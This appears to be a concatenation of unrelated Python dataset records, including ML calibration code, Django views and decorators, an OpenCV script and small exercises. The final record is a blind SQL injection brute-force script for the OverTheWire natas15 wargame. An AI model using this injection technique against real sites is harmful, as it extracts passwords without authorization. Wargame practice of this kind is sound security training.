z = torch.normal(torch.zeros(1, shared.noise_dim),
config.latent_std).to(device)
weights = hnet.forward(uncond_input=z,
weights=theta_current)
else: # Main network only training.
weights = None
# I use the validation batch size on purpose, since it is usually
# bigger and we just want to quickly compute the logits.
curr_bs = config.val_batch_size
n_processed = 0
while n_processed < num_samples:
if n_processed + curr_bs > num_samples:
curr_bs = num_samples - n_processed
n_processed += curr_bs
sind = n_processed - curr_bs
eind = n_processed
### Compute negative log-likelihood (NLL).
X = data.input_to_torch_tensor(inputs[sind:eind, :], device,
mode='train')
if gauss_main:
Y = mnet.forward(X, weights=None, mean_only=False,
extracted_mean=emean, extracted_rho=erho,
sample=weights, **mnet_kwargs)
else:
Y = mnet.forward(X, weights=weights, **mnet_kwargs)
if allowed_outputs is not None:
Y = Y[:, allowed_outputs]
logit_outputs[j, sind:eind, :] = Y
# Since we computed all training logits, we might as well compute
# the training accuracy on the predictive distributions at temperature 1
# (note, temperature doesn't change predicted labels).
pred_dists = F.softmax(logit_outputs, dim=2).mean(dim=0)
assert pred_dists.ndim == 2
_, pred_labels = torch.max(pred_dists, 1)
train_acc = 100. * torch.sum(pred_labels == labels) / num_samples
logger.debug('Task %d -- training accuracy: %.2f%%.' % \
(task_id+1, train_acc))
log_pred_dists = torch.log(torch.clamp(pred_dists, min=1e-5))
in_entropies = -torch.sum(pred_dists * log_pred_dists, dim=1)
# Normalize by maximum entropy.
max_ent = - np.log(1.0 / data.num_classes)
in_entropies /= max_ent
in_entropies_mean = in_entropies.mean()
in_entropies_std = in_entropies.std()
logger.debug('Task %d -- training in-dist. entropy: %f.' % \
(task_id+1, in_entropies_mean))
if not hasattr(shared, 'train_in_ent_mean'):
shared.train_in_ent_mean = []
shared.train_in_ent_std = []
shared.train_in_ent_mean.append( \
in_entropies_mean.detach().cpu().numpy())
shared.train_in_ent_std.append(in_entropies_std.detach().cpu().numpy())
if only_correctly_classified:
num_correct = torch.sum(pred_labels == labels)
logger.info('Task %d -- only using %d/%d correctly classified ' \
% (task_id+1, num_correct, num_samples) + \
'samples for calibration.')
logit_outputs = logit_outputs[:, pred_labels == labels, :]
num_samples = num_correct
assert logit_outputs.shape[1] == num_correct
labels = labels[pred_labels == labels]
assert labels.shape[0] == num_correct
# Sanity check!
pred_dists = F.softmax(logit_outputs, dim=2).mean(dim=0)
_, pred_labels = torch.max(pred_dists, 1)
assert torch.sum(pred_labels == labels) == num_correct
logit_outputs = logit_outputs.detach()
### Calibrate temperature.
for i in range(config.cal_temp_iter):
optimizer.zero_grad()
batch_inds = np.random.randint(0, num_samples, config.batch_size)
batch_logits = logit_outputs[:, batch_inds, :]
batch_labels = labels[batch_inds]
assert batch_logits.ndim == 3
# Note, this first option is more numerically stable when calibrating NLL.
if cal_per_model or num_w_samples == 1:
loss = 0
for j in range(num_w_samples):
if cal_target_entropy != -1:
batch_sm = F.softmax(batch_logits[j, :, :] / \
ttf(temp_param), dim=1)
# For numerical stability.
batch_log_sm = torch.log(torch.clamp(batch_sm, min=1e-5))
# Mean entropy within the batch.
batch_entropy = -torch.sum(batch_sm * batch_log_sm,
dim=1).mean()
loss += (batch_entropy - cal_target_entropy)**2
else: # Compute NLL loss
# Note, softmax will be computed inside the `cross_entropy`.
loss += F.cross_entropy( \
batch_logits[j, :, :] / ttf(temp_param), batch_labels,
reduction='mean')
loss /= num_w_samples
else:
batch_pred_dist = F.softmax(batch_logits / ttf(temp_param),
dim=2).mean(dim=0)
# FIXME nll_loss expects log_softmax as input. To compute the
# predictive distribution, we have to first average softmax outputs
# before we can apply the log, which might lead to numerical
# instabilities.
#batch_log_pd = batch_pred_dist
#batch_log_pd[batch_pred_dist < 1e-5] = 1e-5
batch_log_pd = torch.clamp(batch_pred_dist, min=1e-5)
batch_log_pd = torch.log(batch_log_pd)
if cal_target_entropy != -1:
# Mean entropy within the batch.
batch_entropy = -torch.sum(batch_pred_dist * batch_log_pd,
dim=1).mean()
loss += (batch_entropy - cal_target_entropy)**2
else: # Compute NLL loss
loss = F.nll_loss(batch_log_pd, batch_labels, reduction='mean')
loss.backward()
if config.clip_grad_value != -1:
torch.nn.utils.clip_grad_value_(optimizer.param_groups[0]['params'],
config.clip_grad_value)
elif config.clip_grad_norm != -1:
torch.nn.utils.clip_grad_norm_(optimizer.param_groups[0]['params'],
config.clip_grad_norm)
optimizer.step()
if ttf_choice == 'linear':
# NOTE In this case, nothing prevents the temperature from going
# negative (e.g., when starting with a large learning rate).
# Therefore, we have to actively capture this case.
temp_param.data = torch.clamp(temp_param, min=1e-5)
if i % 50 == 0:
writer.add_scalar('cal/task_%d/loss' % task_id, loss, i)
writer.add_scalar('cal/task_%d/temp' % task_id,
ttf(temp_param), i)
final_temp = ttf(temp_param).data
shared.softmax_temp[task_id] = final_temp.data
logger.info('Calibrated softmax temperature of task %d is: %f.' % \
(task_id+1, final_temp))
logger.info('Temperature calibration for task %d ... Done' % (task_id+1))
if __name__ == '__main__':
pass
| StarcoderdataPython |
3251121 | <reponame>honeyhugh/PythonCurso
t = 'pedra', 'papel', 'tesoura', 'garrafa', 'mouse', 'livro'
for pos in range(0, len(t)):
print(f'\nNa palavra {t[pos].upper()} as vogais são: ', end='')
for v in t[pos]:
if v in 'aeiou':
print(v, end=' ')
| StarcoderdataPython |
1745597 | <reponame>iRomi14/drmlib
# -*- coding: utf-8 -*-
"""
Performs some pre-release checks
"""
import pytest
from tests.conftest import perform_once
def test_changelog_and_version(accelize_drm):
"""
Checks if Version match with Git tag and if changelog is up to date.
"""
perform_once(__name__ + '.test_changelog_and_version')
from os.path import join
from subprocess import run, PIPE
from re import fullmatch
if not accelize_drm.pytest_build_environment:
pytest.skip("Can only be checked in build environment")
# Ensure tags are pulled
try:
run(['git', 'fetch', '--tags', '--force'],
stderr=PIPE, stdout=PIPE, universal_newlines=True)
except FileNotFoundError:
fail = (
pytest.fail if accelize_drm.pytest_build_type == 'debug' else
pytest.xfail)
fail('Git is required for this test.')
# Get head tag if any
result = run(['git', 'describe', '--abbrev=0', '--exact-match', '--tags',
'HEAD'], stderr=PIPE, stdout=PIPE, universal_newlines=True)
if result.returncode:
pytest.skip("Can only be checked on tagged git head")
tag = result.stdout.strip()
version = tag.lstrip('v')
# Checks tag format using library version
lib_ver = accelize_drm.get_api_version()
assert tag == 'v%s' % (lib_ver.version.split('+')[0])
# Check tag format match semantic versioning
if not fullmatch(r'^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)'
r'(-(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)'
r'(\.(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*)?'
r'(\+[0-9a-zA-Z-]+(\.[0-9a-zA-Z-]+)*)?$', version):
pytest.fail('"%s" does not match semantic versioning format.' % version)
# Check if changelog is up-to-date (Not for prereleases)
if not lib_ver.prerelease:
changelog_path = join(accelize_drm.pytest_build_source_dir, 'CHANGELOG')
with open(changelog_path, 'rt') as changelog:
last_change = changelog.readline().strip()
assert fullmatch(
r"\* [a-zA-Z]{3} [a-zA-Z]{3} [0-9]{2} [0-9]{4} Accelize " + tag,
last_change)
# Check prerelease format:
# Alpha: "1.0.0-alpha.1"
# Beta: "1.0.0-beta.1"
# Release candidate: "1.0.0-rc.1"
else:
assert fullmatch(r"(alpha|beta|rc)\.[0-9]+", lib_ver.prerelease)
| StarcoderdataPython |
1732299 | <reponame>WebPowerLabs/django-trainings<gh_stars>0
from functools import wraps
from profiles.models import InstructorProfile
from django.http.response import Http404, HttpResponseRedirect
from courses.models import Course, Content
from lessons.models import Lesson
from resources.models import Resource
from django.core.urlresolvers import reverse
from packages.models import Package
from profiles.models import InfusionsoftProfile
from django.shortcuts import get_object_or_404
from django.contrib.auth.views import redirect_to_login
def purchase_or_instructor_member_required(model):
"""
Decorator for views. Receives model of content. Returns view if there is no
package associated with the content or user is a staff or instructor member
or user has PackagePurchase. Redirects to content purchase page if not.
"""
if model not in [Course, Lesson, Resource]:
error_message = '{} should be one of the next models [Course, Lesson, Resource]'
raise ValueError(error_message.format(model))
def wrapper(view_func):
@wraps(view_func)
def check(request, *args, **kwargs):
user = request.user
slug = kwargs.get('slug', None)
content = get_object_or_404(Content, slug=slug)
if user.is_authenticated() and user.is_active:
packages = Package.objects.get_for_content(content)
profile = InfusionsoftProfile.objects.get_or_create(
user=user)[0]
profile.update_tags()
purchased_list = model.objects.purchased(user)
try:
instructor = user.instructorprofile
except InstructorProfile.DoesNotExist:
instructor = False
if content in purchased_list or user.is_staff or instructor:
return view_func(request, *args, **kwargs)
# if multiple packages exist return a list of purchase options
if len(packages) > 1:
return HttpResponseRedirect(
reverse('packages:list_for_content',
kwargs={'content_pk': content.lesson.pk}))
# if only one exists return the package
if len(packages) == 1:
return HttpResponseRedirect(reverse('packages:detail',
kwargs={'pk': packages[0].pk}))
else:
return HttpResponseRedirect(
reverse('packages:list_for_content',
kwargs={'content_pk': content.lesson.pk}))
return redirect_to_login(request.path)
return check
return wrapper
def instructor_member_required(view_func):
"""
Decorator for views that checks that the user is logged in and is a staff
or instructor member. Raises 404 if not.
"""
@wraps(view_func)
def check(request, *args, **kwargs):
user = request.user
if user.is_authenticated() and user.is_active:
try:
instructor = user.instructorprofile
except InstructorProfile.DoesNotExist:
instructor = False
if user.is_staff or instructor:
return view_func(request, *args, **kwargs)
raise Http404
return check
def can_edit_content(model):
"""
Decorator for views that checks that the user is staff or is owner
of content object. Raises 404 if not.
"""
if model not in [Course, Lesson, Resource]:
raise ValueError('{} should be one of the next models [Course, Lesson, Resource]'.format(model))
def wrapper(view_func):
@wraps(view_func)
def check(request, *args, **kwargs):
user = request.user
slug = kwargs.get('slug', None)
content = model.objects.get(slug=slug)
if user.is_authenticated() and user.is_active and (user.is_staff or content.owner == user):
return view_func(request, *args, **kwargs)
raise Http404
return check
return wrapper
| StarcoderdataPython |
138660 | <filename>blackScreen.py
import cv2
from matplotlib import image
import numpy as np
video = cv2.VideoCapture(0)
image = cv2.imread("me.jpeg")
while True:
ret,frame = video.read()
print(frame)
frame = cv2.resize(frame,(640,480))
image = cv2.resize(frame,(640,480))
u_black = np.array([104,153,70])
l_black = np.array([30,30,0])
mask = cv2.inRange(frame,l_black,u_black)
res = cv2.bitwise_and(frame,frame,mask=mask)
f=frame-res
f= np.where(f==0,image,f)
cv2.imshow("video",frame)
cv2.imshow("mask",f)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video.release()
cv2.destroyAllWindows() | StarcoderdataPython |
3260110 | <gh_stars>100-1000
__all__ = ['ttypes', 'constants', 'ReadOnlyScheduler', 'AuroraSchedulerManager', 'AuroraAdmin']
| StarcoderdataPython |
4804536 | <reponame>blakermchale/robot-control
#!/usr/bin/env python3
from enum import IntEnum, auto
from ament_index_python.packages import get_package_share_directory
# Get relative package directories
ROBOT_CONTROL_PKG = get_package_share_directory("robot_control")
# API's and the simulators they work with
API_PAIRS = {
"mavros": ["airsim", "gazebo", "ignition", "none"],
"inherent": ["airsim", "ignition"],
"none": ["airsim", "gazebo", "ignition", "none"],
}
class VehicleType(IntEnum):
DRONE = 0
ROVER = auto()
PLANE = auto()
class SimType(IntEnum):
NONE = 0
GAZEBO = auto()
AIRSIM = auto()
IGNITION = auto()
class ApiType(IntEnum):
NONE=0
INHERENT=auto()
MAVROS=auto()
class SimSource(IntEnum):
DEFAULT=0
ROBOT=auto()
NUAV=auto()
class ScenarioType(IntEnum):
NONE=0
DARKNET=1
| StarcoderdataPython |
4840761 | import hmac
import json
from base64 import b64encode
from hashlib import sha256
from django.conf import settings
from django.core.serializers import serialize
from django.http import Http404, HttpResponse
from django.http.response import JsonResponse
from django.shortcuts import render
from django.views.generic.base import TemplateView
from rest_framework import authentication, permissions, status
from django.contrib.gis.db.models.functions import Centroid, AsGeoJSON
from rest_framework.response import Response
from rest_framework.views import APIView
from django.views import generic
from rest_framework import viewsets
from .models import Field, Farm
from .serializers import PersonToRoleToOrgSerializer, FarmSerializer
from .utils.survey.parser import parse_survey
import requests
from django.contrib.auth.mixins import LoginRequiredMixin
from django.conf import settings
class FarmsView(LoginRequiredMixin, generic.ListView):
template_name = "farms.html"
model = Farm
class FarmDetail(LoginRequiredMixin, generic.DetailView):
template_name = "farm_detail.html"
model = Farm
def get_context_data(self, **kwargs):
"""Return the view context data."""
context = super().get_context_data(**kwargs)
farm_fields = Field.objects.filter(farm=context['farm'])
context["geojson"] = json.loads(serialize("geojson", farm_fields))
return context
class FieldDetail(LoginRequiredMixin, generic.DetailView):
template_name = "field_detail.html"
model = Field
def get_context_data(self, **kwargs):
"""Return the view context data."""
context = super().get_context_data(**kwargs)
context["geojson"] = json.loads(serialize("geojson", [context['field']]))
res = requests.post(settings.MONITORING_SVC_URL + '/soilgrids/ocs_0-30cm_mean', json=context['geojson'])
context["stats"] = res.json()
centroid = context['field'].geom.centroid
context["specs"] = {
"latitude" : centroid.y,
"longitude" : centroid.x,
"area" : round(context['field'].geom.transform('EPSG:3035', clone=True).area / 10000, 2)
}
return context
###########################################################################################
# API Views
###########################################################################################
class FarmsViewSet(viewsets.ModelViewSet):
serializer_class = FarmSerializer
queryset = Farm.objects.all().order_by('name')
# Create your views here.
class TypeFormFarmerSurvey(APIView):
"""
Receives a TypeForm Farmer Survey response through a webhook and parses it into FarmDB
"""
authentication_classes = []
permission_classes = [permissions.AllowAny]
def get(self, request, pk, format=None):
return None
def post(self, request, format=None):
if valid_typeform_signature(request):
parsed_data = parse_survey(request.data)
# TODO: try/except to store request body and stacktrace to debug db table
serializer = PersonToRoleToOrgSerializer(data=parsed_data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
return Response({}, status=status.HTTP_401_UNAUTHORIZED)
def valid_typeform_signature(request):
api_signature = request.META.get("HTTP_TYPEFORM_SIGNATURE")
secret = settings.FARMDB_CORE_TYPEFORM_SECRET
computed_sig = hmac.new(
secret.encode("utf-8"), msg=request.body, digestmod=sha256
).digest()
signature = "sha256=" + b64encode(computed_sig).decode()
return api_signature == signature
| StarcoderdataPython |
1646994 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def str2tree(self, s: str) -> TreeNode:
def buildTree(s):
# find the first left bracket
ix = s.find('(')
if ix < 0:
return TreeNode(int(s)) if s else None
lcounter = 1
rcounter = 0
jx = ix + 1
while jx < len(s) and lcounter >= rcounter:
if s[jx] == '(':
lcounter += 1
elif s[jx] == ')':
rcounter += 1
if rcounter == lcounter:
break
jx += 1
if s[:ix] != '':
root = TreeNode(s[:ix])
root.left = buildTree(s[ix+1:jx])
root.right = buildTree(s[jx+1:-1])
else:
root = buildTree(s[ix+1:jx])
return root
return buildTree(s)
# class Solution:
# '''
# Modified version
# '''
# def str2tree(self, s: str) -> TreeNode:
# def buildTree(s):
# # find the first left bracket
# ix = s.find('(')
# if ix < 0:
# return TreeNode(int(s)) if s else None
# unmatched = 1
# jx = ix + 1
# while jx < len(s):
# if s[jx] == '(':
# unmatched += 1
# elif s[jx] == ')':
# unmatched -= 1
# if unmatched == 0:
# break
# jx += 1
# root = TreeNode(s[:ix])
# root.left = buildTree(s[ix+1:jx])
# root.right = buildTree(s[jx+2:-1])
# return root
# node = buildTree(s)
# return node
# class Solution:
# '''
# solution from others
# '''
# def str2tree(self, S):
# ix = S.find('(')
# if ix < 0:
# return TreeNode(int(S)) if S else None
# bal = 0
# for jx, u in enumerate(S):
# if u == '(': bal += 1
# if u == ')': bal -= 1
# if jx > ix and bal == 0:
# break
# root = TreeNode(int(S[:ix]))
# root.left = self.str2tree(S[ix+1:jx])
# root.right = self.str2tree(S[jx+2:-1])
# return root
| StarcoderdataPython |
164485 | <filename>Python/natas15-chars.py
# brute forcing password of natas 15
import requests
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
username = "natas15"
password = "<PASSWORD>"
user_exists = "This user exists."
char_exists = ""
for char in characters:
url = 'http://natas15.natas.labs.overthewire.org/index.php?username=natas16" and password like binary' + "'%" + char + "%'" + '"'
response = requests.get(url, auth= (username, password) )
print("checked: ", char)
if user_exists in response.text:
char_exists += char
print("character exists ", char_exists)
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.